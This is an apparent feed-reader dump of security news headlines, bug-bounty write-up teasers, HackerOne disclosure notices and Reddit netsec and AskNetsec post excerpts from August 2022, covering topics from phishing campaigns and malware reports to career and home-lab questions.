    I copy a potentially malicious file and paste it in a sandbox. Am I going to get infected by copying the file from, say, an email? How else could I get it to a sandbox? submitted by /u/papervault [link] [comments]
    please explain the risk. vpn blocked from remote computer.
    I'm not sure if this is the right place to ask the question; sorry if it's not. It's my work's new policy that a computer cannot have a VPN connection into the office from a computer being accessed remotely. Example: I have WorkPC in my closet; it's got lots of RAM and CPU, and I only install work apps on it. I have my HomePC that I use for most things, which is mine, and I have a nice multi-monitor setup to go with it. I used to sit at HomePC and remote desktop to WorkPC to do my work (both on my local network), but to do the work, once I'm connected to WorkPC, I connect WorkPC's VPN into work so I can check out licenses and stuff. This is, as of today, blocked, so now I have to figure out how to move all my computers around to be able to get any work done. What is the threat they are trying to prevent? Is it a realistic one? (How annoyed should I be right now?) Any ideas how I should have my PCs set up? I also wanted the flexibility to connect to WorkPC from a laptop so I could do work from any location in my house, but this seems to break that too... It seems like my only solution is a work laptop + KVM switch + annoyance? Thanks. submitted by /u/rLarc [link] [comments]
    Getting more and more emails about suspicious activity on various accounts?
    It all started last week with Ubisoft and then a few days apart I keep getting the same thing from Microsoft, Mega and PayPal. I haven't clicked on any suspicious links and I do use a VPN only for a particular website, but never the ones I mentioned earlier and I haven't gotten on them in months. I checked my email address in https://haveibeenpwned.com and it was found in 5 breaches, so I guess I'm waiting for a 5th email telling me one of my accounts encountered suspicious activity. Right now I'm taking all safety precautions and changing my passwords and enabling Two-Factor Authentication where possible. But I'm still wondering why this is happening? submitted by /u/throacco19 [link] [comments]
  • Open

    IDOR on TikTok Seller
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1509057 - Bounty: $500
    CSRF Account Takeover
    TikTok disclosed a bug submitted by s3c: https://hackerone.com/reports/1253462 - Bounty: $2373
    IDOR allowing to read another user's token on the Social Media Ads service
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1464168 - Bounty: $2000
  • Open

    From Hunted to Hunter
    Please note: this article contains potentially triggering stories about child sexual abuse Continue reading on Medium »
    L’espion Challange || CyberDefenders
    Hello Guys This is Abdelrahman Attia today we will solve L’espion Challange From Cyber Defenders Continue reading on Medium »
  • Open

    StepSecurity releases tool that it used to improve security of 30 critical open-source projects…
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving data from other tables
    No content preview
    How To Hack With SQL Injection Attacks! DVWA low security — StackZero
    No content preview
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    No content preview
  • Open

    Disrupting SEABORGIUM’s ongoing phishing operations
    submitted by /u/SCI_Rusher [link] [comments]
    I will Live create a POC for CVE-2022-26923
    Tomorrow (08.17, at 20:00 EEST) I will stream how I develop a POC for CVE-2022-26923 on my Twitch: https://www.twitch.tv/lsecqt Feel welcome, guys! submitted by /u/lsecqt [link] [comments]
  • Open

    SOVA malware is back and is evolving rapidly
    submitted by /u/Frank538 [link] [comments]
  • Open

    My Recon Tools
    Hello Amazing People, Continue reading on System Weakness »
    DOM XSS ON A GOV DOMAIN BYPASSING WAF
    Welcome back readers. I hope everyone is doing well. I have decided to do a writeup on a DOM Based XSS I recently found bypassing WAF… Continue reading on Medium »
    Cross-Site Scripting (XSS) Attacks
    Cross-site scripting (often shortened to XSS) is a common security vulnerability that is more prevalent in web applications. Continue reading on Medium »
    Monitoring Linux host metrics with the Node Exporter information disclosure $350
    Censys Continue reading on Medium »
    Apache Rootkits RCE
    Author: lalualowan Continue reading on Medium »
    Interview: The XSS Rat
    Bug bounty hunter, Teacher and Father Continue reading on Medium »
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    Hey 👋 Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-08-16 Review
    [HTB] Antique Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Multiple cloud vendors impacted by PostgreSQL vulnerability that exposed
    Article URL: https://portswigger.net/daily-swig/multiple-cloud-vendors-impacted-by-postgresql-vulnerability-that-exposed-enterprise-databases Comments URL: https://news.ycombinator.com/item?id=32483937 Points: 1 # Comments: 0
  • Open

    Things you can find in RAM that are useful in investigations.
    submitted by /u/DFIRScience [link] [comments]
    The Hitchhiker's Guide to DFIR: From Beginners and Experts
    I'm very excited to share the first edition of, what's been in the works for almost 5 months now, "The Hitchhiker's Guide to DFIR"; a project started by Andrew Rathbun as a proof of concept for a crowdsourced and opensource approach to publishing. The idea was simply to gather a bunch of people willing to write a chapter of their own choosing covering their stories, knowledge or experiences within the domain of DFIR. V1 contains chapters from some well-known forensicators as you might already know them. You can also find my chapter indexed 8th and titled "Artifacts as Evidence" where I share some of the artifacts that I encountered in the wild. What began as a fun and collaborative project, has now resulted in this small DFIR book. I hope it sparks the interest of beginners, helps the practitioners and is refreshing for the professionals! Note: This is a free distribution, you don't have to pay anything on the Leanpub landing page. Hitchhiker's Guide to… by Andrew Rathbun et al. [PDF/iPad/Kindle] (leanpub.com) submitted by /u/Nisarg12 [link] [comments]
  • Open

    family bible records
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    You. Are. Welcome. 🤗
    submitted by /u/ManaHoney504 [link] [comments]
    Various Music
    https://www.7xr.nl/Music/ There's also https://www.7xr.nl/games/ for games submitted by /u/neheb [link] [comments]
    Index of /Files/
    submitted by /u/taramj13 [link] [comments]
  • Open

    FreeBuf Morning Report | Cyber threats surge after the Trump "raid"; Douyin launches source-tracing and other features to tackle misinformation
    The FBI has warned that cyber threats against law enforcement officials have surged since the FBI's raid last week on former President Donald Trump's Mar-a-Lago residence in Florida.
    A macOS vulnerability could let attackers access all files on a Mac
    Security researchers found an injection vulnerability related to how macOS handles system software updates that could let attackers access all files on a Mac device.
    New PyPI package delivers fileless Linux malware
    Sonatype researchers discovered a new PyPI package named "secretslib" designed to drop a fileless cryptominer into the memory of Linux machines.
  • Open

    Analysis of new activity characteristics of the South Asian Patchwork APT group
    Authors: Knownsec 404 Lab APT Advanced Threat Intelligence Team, K & Nan. 1. Overview Patchwork is a South Asian APT group that has been active since December 2015. It has long conducted cyber espionage against the government, healthcare, research and other sectors in China, Pakistan and other South Asian countries. PatchWork APT is an interesting name, derived from the fact that the group's arsenal is patched together from open-source code (underground forums, the dark web, GitHub, etc.). Knownsec 404 Lab APT...

  • Open

    Want to LEAVE Pentesting
    FYI - crosspost to get more opinions. Hi all - I know usually the posts are "I want to get into pentesting". I have the opposite predicament. I'm an internal OT/IT pentester. I perform assessments on pretty much everything: SCADA, DCS, web apps, authentication systems, network, Active Directory, you name it. I've been doing this for about a year now and can see myself doing it for maybe 1 more year. Responsibilities other than pentesting: purple team engagements with the SOC; building out red team infrastructure for testing exploits/TTPs; Python, PowerShell, bash scripting/automation for tooling/workflows. Reasons I'd like to leave: I travel about 6-7 times a year. I have a good balance and although I'm young, I prefer a role that is more structured and eventually I would prefer to tra…
    How should the periodic cyber security report look?
    Hi, I have been asked by our company's head of cybersecurity to prepare a monthly report related to cybersecurity technologies. What should the report contain? Can anyone share suggestions or a sample report? submitted by /u/techno_it [link] [comments]
    Confused on what point to begin learning
    How much code/what languages should I know beforehand, before indulging in learning hacking methods and Red/Blue strategies and trying to get certified in cybersecurity, to be able to breeze by and not struggle as much compared to not knowing any coding skills? submitted by /u/fawzi97 [link] [comments]
    Can tik tok on Android access my MFA code in Authy or Google Authenticator?
    I've read some really bad articles saying that Tik Tok is overly permissive on Android. Could tik Tok in theory access the MFA codes on my phone if I scanned the QR codes to add them into either Authy or Google Authenticator before I installed Tik Tok? submitted by /u/cryptocritical9001 [link] [comments]
    How many goals do symmetric and asymmetric encryption achieve?
    Authentication, Integrity, Non-Repudiation, Confidentiality. Is my question even correct? Because I'm seeing lots of books saying symmetric encryption can't provide non-repudiation. So, can we generalize for all symmetric cryptography? And what about asymmetric? Does it achieve all goals? submitted by /u/syavage [link] [comments]
    Data Security and Privacy: Using a Dedicated Proxy Server and NordVPN
    r/AskNetsec As the title says, I'm trying to get the most secure and fastest connection possible. I work in the financial services industry and stream in my off-time so I have a couple of questions about online privacy and security. Is there a benefit of using BOTH a dedicated proxy server and VPN at the same time? In my mind, the proxy server hides my IP address, then the VPN both hides the proxy IP address and encrypts the data. I set up my dedicated proxy server through Windows 10 directly. No issues whatsoever. Is this the best and most secure method? I have 5 dedicated proxy servers and am only using one that's managed by Windows 10? Several apps are set up through NordVPN with tunneling and a killswitch including Tor, Signal, OBS, and several other apps. When I try this with Google Chrome all while using my proxy server, it doesn't connect to the internet? Is there a fix for this? Should be noted, I'm able to use and connect to the internet through Chrome using my proxy server if I'm using the NordVPN Chrome extension - but the tunneling and kill switch isn't in place? Is there a fix for this? The most secure way of browsing the internet is obviously using Tor with my proxy and VPN, but are there any other methods of increasing my privacy and security outside of using a dedicated proxy server and VPN at the same time? I'm open to suggestions of any sort. submitted by /u/fletchketchem [link] [comments]
    Availability and pricing of Botnets (Botnet-as-a-Service)
    Hi r/AskNetsec! I'm preparing myself for a presentation regarding bots and botnets. I will be talking about types of bots like good bots, bad bots, and what they can do, how you can protect yourself against them, some information about popular botnets that were used in recent years, how IoT devices are insecure and can be used to attack (Miraibot example), etc. One of my talking points is how in recent years the prices of renting servers and services went down which makes creating botnets more affordable than ever. I wanted to provide some examples with pricing but this is where I stumbled into a wall. I've looked over more popular underground marketplaces and found only offers for buying bots to create your own botnet, training materials on how to create botnets, services for generating likes, subscribers or discord bots or DDoS. Nothing related to renting botnet infrastructure for attacks like spamming, credential stuffing, ransomware, password bruteforcing, etc. During my research I've found some articles regarding this topic, but they are pretty old and the prices themselves are all over the place. https://www.zdnet.com/article/study-finds-the-average-price-for-renting-a-botnet/ https://www.secplicity.org/2017/03/07/know-much-costs-rent-iot-botnet/ https://datadome.co/learning-center/what-is-ddos-booter-botnet-booter/ My kind question to you all is if you could provide me with some info on the pricing or screenshots of the offers if you have seen any recently? Direct links are most likely against this subreddit's rules, so only price and botnet type info, and for screenshots the seller and any other details that could point to the particular marketplace/seller can be blurred. Thanks! submitted by /u/vlot321 [link] [comments]
  • Open

    Process Behaviour Anomaly Detection Using eBPF and Unsupervised-Learning Autoencoders
    submitted by /u/sanitybit [link] [comments]
    Tracking Internet facing Industrial Control System devices
    submitted by /u/Mysterii8 [link] [comments]
    Why Action Bias Is Damaging Your Security Response
    submitted by /u/mesok8 [link] [comments]
    EvilPLC Attack: Using a PLC to Gain Code Execution on Engineering Workstation
    submitted by /u/derp6996 [link] [comments]
    Attacking Google's Titan M Security Key with Only One Byte
    submitted by /u/sanitybit [link] [comments]
    HijackLibs: an open-source, community-driven project tracking DLL Hijacking opportunities in in Windows
    submitted by /u/sanitybit [link] [comments]
    STrace: MIT Licensed Windows Reimplementation of DTrace
    submitted by /u/sanitybit [link] [comments]
    NthLink VPN found to be regular shadowsocks using same pre-shared keys for all users
    submitted by /u/yarmak [link] [comments]
  • Open

    HacktheBox [Devzat]
    Devzat was a Medium ranked box on the HacktheBox platform involving heavy enumeration. The initial foothold is gained by identifying a… Continue reading on Medium »
    HacktheBox[Meta]
    Meta was a medium machine on HacktheBox. By identifying an additional virtual host, the user is able to find an API running exiftool… Continue reading on Medium »
    HoaxShell — Reverse Shell
    HoaxShell is a tool developed in Python that generates payloads capable of bypassing Windows Defender and other antivirus products… Continue reading on 100security »
    CRTP Review
    TLDR; Continue reading on Medium »
    eLearnSecurity Penetration Testing Professional ( eCPPT ) Review
    eCPPT/PTP Writeup Continue reading on Medium »
  • Open

    New Bug Bounty Alert: Welcome Solace Finance!
    After an exciting partnership announcement, we welcome Solace Finance as the newest bug bounty vault! Continue reading on Medium »
    Vega Bug Bounties
    Starting today, Monday 15th of August 2022, the Vega Protocol is officially launching the Vega Bug Bounty Program! Continue reading on Vega Protocol »
    FFUF Tool 9 tips, File Inclusion Guide, Code Injection Guide | MONDAY HACKING | BotAmi | EPISODE…
    Hello, Hackers 👋👋 Continue reading on Medium »
    How to **actually** use Amass more effectively — Bug Bounty
    99% of bug hunters only use 1% of Amass’ potential… Continue reading on Medium »
    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    SQL Injection
    In this section, I’ll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL… Continue reading on Medium »
    Business Logic Vulnerability via IDOR
    Exploiting a Logic Vuln via IDOR. #Bugbounty Continue reading on Medium »
  • Open

    CHFI v 10 new topics
    I bought the course for CHFI v9 from EC-Council a while ago and delayed writing the exam till now. Now the exam is based on v10 and I know most of the content is the same, but the 2 newly added modules are missing: IoT Forensics, Dark Web Forensics. Anyone know of any good resources where I can read about these topics myself? Any help would be much appreciated, thank you submitted by /u/Top-Law8118 [link] [comments]
    Demonstrating Basic Computing Knowledge
    I have the opportunity to apply for a digital forensics position that will train. There is no digital forensics experience required. That being said, it is very competitive. If I wanted to gain some tangible skills to demonstrate I have some knowledge of computing, would you recommend getting CompTIA A+, S+, N+? Any others? I know these do not necessarily correlate directly with digital forensics. submitted by /u/invictusliber [link] [comments]
  • Open

    Giving away some wireless gear (alfa cards, d-links) to two people
    Hey r/ExploitDev - I was clearing out some things from my office this weekend and came across two Alfa 802.11b/g wireless cards and two DIR-601s. I used these a while back when I was doing the OSWP labs. [Timestamp](https://i.imgur.com/SvQhRyn.jpg) I spoke with the mods and they are cool with me doing a giveaway raffle for these. There is nothing fancy about the routers or the alfa cards (they are both old commodity hardware) but could be beneficial if you are looking to take the OSWP or starting to study the basics of 802.11 attacks. Raffle Terms: Comment to enter RedditRaffler will be used to select two winners approximately 24 hours from now I'll contact the winners via DM and ship you one Alfa card and DIR-601 "kit" seen in the above timestamp. I'll pay for the shipping costs. CONUS-Only shipping Minimum account age is 30 days Thanks! submitted by /u/Bowserjklol [link] [comments]
  • Open

    Update Zoom for Mac now to avoid root-access vulnerability
    Article URL: https://arstechnica.com/information-technology/2022/08/zoom-patches-mac-auto-updater-vulnerability-that-granted-root-access/ Comments URL: https://news.ycombinator.com/item?id=32472030 Points: 14 # Comments: 2
  • Open

    SecWiki News 2022-08-15 Review
    [The Road to Automated Bounties] A summary of 3 months of first attempts and 10,000 yuan in income by BaCde; SecWiki Weekly (Issue 441) by ourren; The path to building your own ModSecurity rules by SecIN community; SANS 2022 Threat Hunting Survey Report by Avenger. For more of the latest articles, visit SecWiki
  • Open

    FreeBuf Morning Report | Cyberspace Administration publishes algorithm filings for WeChat, Taobao, Douyin and others; two Redmi phones reported to have security vulnerabilities
    The Cyberspace Administration of China publicly released the names and filing numbers of domestic internet information service algorithms, including the algorithms of several large enterprises and products.
    Black Hat 2022 | Three major trends are now settled worldwide
    Black Hat is widely regarded as the "Oscars of the hacker world"; it focuses on the current real-world security landscape and shares cutting-edge security research, security products and solutions.
    Black Hat 2022 reveals 14 major new research findings
    PCMag picked out 14 headline research results from this year's conference; this article takes a look at each of them.
    CISA and FBI issue joint advisory warning of Zeppelin ransomware attacks
    Zeppelin ransomware first appeared on the threat landscape in November 2019.
    No password at all! Survey finds over 9,000 VNC servers worldwide at risk of exposure
    On hacker forums, demand for access to critical networks via exposed or cracked VNC is high, and in some cases such access can be used for deeper network penetration.
    US sanctions cryptocurrency mixer; Tornado Cash employee arrested
    Dutch authorities announced that the US had arrested, in Amsterdam, a software developer working for a cryptocurrency mixer.
    Killnet hacker group claims to have "breached" Lockheed Martin
    The Moscow Times reports that the hacker group Killnet claims to have launched a large-scale DDoS attack against aerospace and defense giant Lockheed Martin.
    Google fined sixty million dollars for collecting Android location data
    The Australian Competition and Consumer Commission said Google was fined AU$60 million (about 288 million yuan) for misleading users when collecting data.
  • Open

    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    Irremovable guest in facebook event — Facebook bug bounty
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, finding a column containing text
    No content preview
  • Open

    ConINT 2020 and CTF in Five Swinging Iced Girrafes!
    OK so here goes! The first of my throwback sessions! Let’s go back to the weekend of 17th October 2020! Continue reading on Fitness Drinking Security Code »
  • Open

    Burp2Malleable - turn HTTP requests into MalleableC2 profiles
    submitted by /u/CodeXTF2 [link] [comments]
  • Open

    Mega Cooking Recipe "open" dir - looking for possible ways to get this downloaded
    http://www.justbeefrecipes.com - plus 18 more websites, all accessible via the top bar. 91.3K recipes across all sites. Plain text, no images, basically a somewhat fancy opendir. Important to note that these sites only allow 200 requests per IP per day, however this is on a per-site basis. I stumbled across this while looking for more sources to put in version 2 of my cooking recipe archive. However, the aforementioned limit of 200 files per day is not at all ideal. wget and other utilities will carry on downloading after the limit, however the files downloaded will, instead of recipe content, contain an error mentioning this limit. I have a VPN that I can switch IPs with, which works fine, but the real issue is getting these download utilities to pick up where they left off. I haven't yet found a way to force wget or curl to pause downloading after 200 files, and let me switch IPs. This would also get pretty tedious very quickly - 91K recipes means around 455 manual IP switches in all (assuming no cross-site IP usage). So I'm curious - has anyone else run into a site like this, and found a way to download it in an efficient manner? submitted by /u/WAUthethird [link] [comments]

  • Open

    Evade Windows Defender Mimikatz detection by patching the amsi.dll
    submitted by /u/sanitybit [link] [comments]
    DC30 Mainframe Buffer Overflow workshop. This docker container has everything you need to learn how to do MVS buffer overflows.
    submitted by /u/sanitybit [link] [comments]
    Process injection: breaking all macOS security layers with a single vulnerability
    submitted by /u/sanitybit [link] [comments]
    wtfis - A commandline tool that gathers information about a domain or FQDN using various OSINT services and displays them formatted for human consumption.
    submitted by /u/sanitybit [link] [comments]
    From Oscilloscope to Wireshark
    submitted by /u/sanitybit [link] [comments]
    Hacking Zyxel IP cameras to gain a root shell
    submitted by /u/hydrogen18 [link] [comments]
    Threatest, a Go framework for end to end testing threat detection rules
    submitted by /u/thorn42 [link] [comments]
  • Open

    nuclear power documents
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Tonic
    submitted by /u/Plastic_Preparation1 [link] [comments]
    Quite a few movies in 720p mp4 format, mostly from 2016-17
    submitted by /u/draebor [link] [comments]
    Grabbing files from Google Drive
    Looked over the posts here and I'm not finding what I am looking for. Is there an easier way to grab files from Google Drive other than waiting for the files to zip and then downloading? submitted by /u/belly_hole_fire [link] [comments]
  • Open

    If proxychain is not encrypted why is it used
    Can its protocols be changed? submitted by /u/Iam_really_need_name [link] [comments]
    Best certification/courses for network security?
    Looking for the best courses/certs to get to improve my network security skills. Things similar to monitoring packets for malicious activity like DNS beaconing, investigating firewall IDS/IPS events, NGFW configuration, best practices, etc. submitted by /u/Professional-Dork26 [link] [comments]
    Building a Home Lab
    Hey everybody. Currently I am trying to set up a virtual environment so that I can practice on it. I do have a couple of questions though. How would you guys recommend setting up a homelab? I use Fedora as my daily driver and then I have a Kali vm installed with KVM/Qemu via Virt-Manager. My initial plan was to whip up a Windows 10 vm in Virtualbox on my spare mac and then attack it with my Kali machine. I was going to set up the Windows box as 'Host-Only' so that it is isolated. But all the research and videos I have watched only show how to set up a 'Host-Only' network between two virtual machines on the same host computer. Is it possible to set up the scenario that I am describing? To isolate a windows machine on virtualbox and attack it on my other computer using virt-manager? I am under the impression that my 'vulnerable' box should be on the Host Only network mode just for security reasons. But if that is the case, how would I connect to it to attack it? I am pretty sure that what I am describing makes sense but if it turns out that I am wrong and it doesn't, I do apologize! I haven't been on my ethical hacking journey for very long so I am sorry if this is a dumb question or if it has a very simple answer. Thanks! TL;DR: How to isolate a Windows vm on virtualbox within my Mac OS Host and be able to attack it via my Kali machine via Virt-Manager on my Linux host. P.S. Sorry if this isn't the right sub - I tried posting in an ethical hacking and cybersecurity sub but the first one hasn't gotten any replies and the latter deleted my post. Just trying to get some information on this so I can practice. submitted by /u/strings_on_a_hoodie [link] [comments]
    How likely is it to catch a virus nowadays, assuming a standard, up-to-date antivirus?
    I assume many people don't necessarily follow best practices in the digital world - download and run executables from dubious websites, for example. I wonder how prevalent is it for them to catch malware nowadays, provided they have a standard, up-to-date antivirus. Does most widespread malware exploit zero-day attacks and become detected by antiviruses after a few hours/days? How prevalent is more sophisticated malware that can stay undetected for weeks/months? Specifically, How hard is it for attackers to devise keyloggers and ransomware? submitted by /u/Curious-Brain2781 [link] [comments]
    Help me take a step forward in my career
    I’m a software dev with a some years of experience. I’ve always worked for security companies and on security products, so I have lots of exposure to the industry. I find that I like security way more than I like writing code. I’d like to make it my full time job. However, financially I can’t go back to square 1. I am looking for advice on how I can pivot to a true security career while not losing all of the seniority that I’ve built up. I think that security engineer is a logical spot to jump to, but I’m unsure. I am also curious if there are certs that I should pursue. My company will pay for them, but many seem to be either focused on red team (OSCP) or management (CISSP). submitted by /u/Weary_Drummer2211 [link] [comments]
  • Open

    Win NTFS image question
    I have an image of an HD from a 1 year old Dell desktop. It appears to be a windows NTFS but there are no users folders, many other typical windows folders are missing. The drive only has 9.5 GB of data out of 1TB. It is not zeroed, and the image is obviously not bootable. Trying to figure out what could have happened. submitted by /u/SquareEastern4454 [link] [comments]
    INDUSTRIAL SSD, 256GB, MLC,
    submitted by /u/Simply4U2bu [link] [comments]
  • Open

    From Open Redirect to Reflected XSS manually
    # For the purpose of this write-up, and the integrity of the company, we’ll consider that the target we’re testing is: >… Continue reading on Medium »
    Internal Bug Bounty’s & The Importance of Timing
    Read Time: 3 minutes Continue reading on Medium »
    Step 18: Information Gathering — Web Edition
    Been a few days folks, apologies. Orientation at the new job, getting more apartment stuff… it finally feels cozy and homely! Continue reading on Medium »
    How I got into the United Nations’ Hall of Fame
    Continue reading on Bug Zero »
  • Open

    User-Agent — How to change it in the browser?
    The User-Agent request header is a characteristic string that lets servers and network peers identify the… Continue reading on 100security »
    PyPhisher — Phishing Generator
    PyPhisher is a phishing generator for more than 78 sites, including Facebook, Gmail, NetFlix, Tiktok, Twitter, Spotify and many more. Continue reading on 100security »
  • Open

    How to OSINT Russia? part 2
    Tips on searching individuals and businesses through russian websites. Continue reading on Medium »
    Disinformation Days
    While I’m busy finding my way in open source research— and tip of the hat: I’m happy to announce that I’m already contributing to a number… Continue reading on Medium »
    SPY NEWS: 2022 — Week 32
    Summary of the espionage-related news stories for the Week 32 (August 7–13) of 2022. Continue reading on Medium »
  • Open

    SecWiki News 2022-08-14 Review
    The dream of cloud isolation by ourren; Introductory materials on cloud security by 路人甲; netspy - a tool for quickly probing reachable internal network segments by 路人甲; SnakeYaml deserialization by 路人甲; Implementing an Executor memory webshell by 路人甲; How I Hacked my Car by ourren. For more of the latest articles, visit SecWiki
  • Open

    First penetration testing experience: DC-2
    WPScan is a vulnerability scanner bundled by default with Kali Linux.
    FreeBuf Morning Report | First attack techniques against the Starlink satellite network disclosed; Instagram reported to track users' web activity
    For just $25, researchers were able to build a hardware intrusion tool from small components and run arbitrary code on a Starlink satellite dish.
  • Open

    How useful is CVSS Score in CVE triage – The CVSS who cried wolf
    Article URL: https://inthewild.io/blog/how-useful-is-cvss-score-in-CVE-triage Comments URL: https://news.ycombinator.com/item?id=32459335 Points: 1 # Comments: 0
  • Open

    WiFi Standard 802.11ac Packet Analysis
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Post which compared all exploit dev certifications
    Around a month or so ago I saw on this subreddit a post which had a spreadsheet with all the exploit development certifications compared by topics which they covered but I can't seem to find it now. Does anyone have a link to that post or spreadsheet? If so I'd highly appreciate it. Thanks in advance. submitted by /u/xor_eax_eax_ [link] [comments]

  • Open

    Lina Lau: How to Reverse Engineer and Patch an iOS Application for Beginners: Part I
    submitted by /u/KeepYourSleevesDown [link] [comments]
  • Open

    OSINT Tool to know
    In the previous blog we learned what OSINT is; now we have to know what tools are used to do OSINT. Continue reading on Medium »
  • Open

    Pentesting vs Bug Bounty
    Can pentesters instantly become great bug bounty researchers? It may not be as trivial as one might think Continue reading on Medium »
    How I earned a $7000 bug bounty from Grab (RCE Unique Bugs)
    Table of Contents Continue reading on Medium »
    My blackhat stories- How I hacked my school and got a CVE for it.
    Intro: Continue reading on Medium »
    Bypassing unexpected IDOR
    Hello guys, I am back again with another writeup on my very recent bug finding on HackerOne Private VDP. In this writeup I am gonna tell… Continue reading on Medium »
    Escalating Open Redirect to XSS
    Hello everyone. Myself Sagar Sajeev. Continue reading on Medium »
    Latest Bug Bounty Programs, this Aug, Proud Year 2022
    Have you heard about the daily bug bounty programs that invite programmers to find out issues with the software or app they have developed… Continue reading on Medium »
    An Unusual Tale of Email Verification Bypass
    Hey Guys. I’m Sagar Sajeev . Continue reading on Medium »
    Directory Traversal — Explanation [PT/BR]
    Today I decided to do something a bit different; I'm usually more in the habit of writing write-ups than writing about the vulnerabilities themselves… Continue reading on Medium »
  • Open

    PyPhisher — Phishing Generator
    PyPhisher is a phishing generator for more than 78 sites, including Facebook, Gmail, NetFlix, Tiktok, Twitter, Spotify and many more. Continue reading on Medium »
    MSIEXEC — Windows Exploitation
    Using msfvenom we can generate MSI payloads that can help us in the process of exploiting Windows, and in this article… Continue reading on 100security »
    MSFConsole — Password Capture
    msfconsole has an auxiliary module that lets you start services such as FTP, Telnet, VNC, SMB, HTTP, MSSQL, PostgreSQL… Continue reading on 100security »
  • Open

    What is your process for investigating a suspicious link/URL?
    Details around thought process, tools and methods used would be highly appreciated! Even better if the answer is geared towards an enterprise/SOC environment. submitted by /u/Jaruki_Jurakami [link] [comments]
    What is bloom.exe written in?
    Bloom.exe seems to be adware, or a trojan. Malware, of some kind. What I'm wondering is if someone has downloaded it to somewhere it won't work... and looked at its code. And if so, what the language is. I have been getting into scripting... and I'm quite curious about what language the more modern malware is scripted in. Even something as simple as a screenshot will probably satisfy my curiosity. submitted by /u/NinaMercer2 [link] [comments]
    Is it possible to block network access for a specific app on iOS?
    I included lots of details and context in my previous attempt to post this question, but it was deleted by mods due to not being narrowly cast, so I've tried to address that by asking a yes/no question even though my question is actually more about "how". I can reply with details but won't include them here for fear of my question being deleted again. submitted by /u/hc5u [link] [comments]
    Disabling 2FA requires only password knowledge in a google account. How to mitigate this?
    Say a hacker gets control of my computer and has access to my keystrokes. He can change any security settings of the Google account - disable 2FA, change the password, revoke backup codes, etc. - all this just by authenticating via the password (which he can get from the keystrokes). Google doesn't require the 2nd-factor authentication in this scenario (since the session is trusted - it's from my PC). I worry that this kind of attack might happen, and make me lose my Google account. Is there a way to somehow mitigate this risk and enforce 2FA for every such critical action? Reference: https://www.infoq.com/news/2020/07/google-password-2fa-woes/ Thanks! submitted by /u/Curious-Brain2781 [link] [comments]
    A question for somebody who knows how to hack an iPhone
    Okay so I have this old neighbour (let's call him A) that I had added on my Instagram account a while back but then we fell out and I blocked him. But then a couple months ago I received a message from an account which went by his name and he asked me to give him my Instagram account’s password and my phone number to help him recover his hacked account and, after going back and forth with him, I foolishly gave it to him. But after 30 minutes I realised he was going through my dms so I immediately blocked the account and changed all my passwords. Then I dmed A’s account, the one that I had blocked and was sure was his, and he claimed that it wasn't him and it was someone who was doing this to multiple of his followers. I have reason to believe that this is not true because I wasn’t even following him at the time and I believe the alleged fake account was him all along but I got past it and forgot about it. Now, just today I received a text by a stranger who is saying that he got a hold of A’s phone and found my chats and pictures in his gallery and is claiming that A somehow by using my phone number and my Instagram account hacked into my phone and any and every picture that I take on my phone is being saved on his phone. Now this stranger is asking for my lockscreen passwords and stuff telling me that he will help me out and “disconnect the septor” so that A no longer has access to my iphone but I ofc just blocked him because I am not ever giving any of my passwords out again and I think this too is a ruse. Although I can't help but be concerned for my privacy, so is it possible that someone can gain access to my iphone’s camera and gallery and stuff just through my Instagram account? I would really really appreciate some help here and an honest answer because I have no knowledge of anything regarding hacking and other things related to it. Thank you for reading. submitted by /u/Praise-bingus111 [link] [comments]
  • Open

    Ingress-nginx annotation injection allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces
    Kubernetes disclosed a bug submitted by amlweems: https://hackerone.com/reports/1378175 - Bounty: $2500
  • Open

    SecWiki News 2022-08-13 Review
    Operation Mole: analysis of a large-scale attack campaign targeting QNAP network storage devices by ourren. For more of the latest articles, visit SecWiki
  • Open

    How I Hacked my Car
    submitted by /u/CyberMasterV [link] [comments]
    How Cisco got Hacked - Tracking the attacker steps and the logs it generates
    submitted by /u/jwizq [link] [comments]
  • Open

    Process injection breaking all macOS security layers with a single vulnerability
    Article URL: https://sector7.computest.nl/post/2022-08-process-injection-breaking-all-macos-security-layers-with-a-single-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32449426 Points: 2 # Comments: 0
  • Open

    Who "Owns" Your Infrastructure?
    That's a good question. You go into work every day, sit down at your desk, log in...but who actually "owns" the systems and network that you're using? Is it you, your employer...or someone else? Anyone who's been involved in this industry for even a short time has either seen or heard how threat actors will modify an infrastructure to meet their needs, enabling or disabling functionality (as the case may be) to cover their tracks, make it harder for responders to track them, or to simply open new doors for follow-on activity. Cisco (yes, *that* Cisco) was compromised in May 2022, and following their investigation, provided a thorough write-up of what occurred. From their write-up: "Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated…
  • Open

    Filesystem Fuzzing and Responsible Disclosure
    Article URL: https://lwn.net/SubscriberLink/904293/deab9aedc5522142/ Comments URL: https://news.ycombinator.com/item?id=32448962 Points: 1 # Comments: 0
  • Open

    ww1 footage in .swf format
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    An interesting voice confusion discovery in Meta bug bounty
    No content preview
    Server Side Template Injections By Hashar Mujahid.
    No content preview

  • Open

    Server Side Template Injections By Hashar Mujahid.
    In this blog, we are going to learn about what server-side template injections are and how they work by solving PortSwigger's labs. Continue reading on InfoSec Write-ups »
    How I found an XSS vulnerability via using emojis
    An unusual type of Cross-Site Scripting vulnerability made by emoticons Continue reading on Medium »
    Guide to joining the SynFutures V2 testnet
    Overview of SynFutures Continue reading on Medium »
    File Upload Bypass to RCE == $$$$
